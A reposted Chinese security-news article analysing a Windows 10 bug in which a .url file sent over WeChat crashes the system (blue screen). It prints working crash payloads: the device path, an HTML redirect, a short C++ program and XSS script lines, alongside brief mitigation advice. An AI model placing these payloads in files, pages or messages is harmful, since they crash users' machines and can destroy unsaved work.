红色警戒!Windows微信蓝屏文件刨析!

  • A+
所属分类:安全新闻

转载自开普勒安全团队

样本

红色警戒!Windows微信蓝屏文件刨析!


核心代码为:file:///globalroot/device/condrv/kernelconnect

受灾画面:

红色警戒!Windows微信蓝屏文件刨析!

红色警戒!Windows微信蓝屏文件刨析!

红色警戒!Windows微信蓝屏文件刨析!

分析:

红色警戒!Windows微信蓝屏文件刨析!


.url文件

url格式的文件是一种网页文件,只要接触就会触发访问

漏洞分析见之前发的文章:

Windows10使用浏览器崩溃复现及分析

防护方法:

仅对windows10系统有效,其它系统不受影响

windows微信用户可关闭自动下载

红色警戒!Windows微信蓝屏文件刨析!

更多方式(.html   .exe):

<html><head></head><body>><script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script></body></html>
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\.\globalroot\device\condrv\kernelconnect";    WIN32_FILE_ATTRIBUTE_DATA data;    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}

吾爱破解大牛分析:

https://www.52pojie.cn/thread-1354077-1-1.html

红色警戒!Windows微信蓝屏文件刨析!

其他利用方式XSS漏洞:

<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>

请做好个人防护!谨防漏洞威胁!


关注我们
红色警戒!Windows微信蓝屏文件刨析!
红色警戒!Windows微信蓝屏文件刨析!
红色警戒!Windows微信蓝屏文件刨析!

识别二维码,关注我们




本文始发于微信公众号(WhITECat安全团队):红色警戒!Windows微信蓝屏文件刨析!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: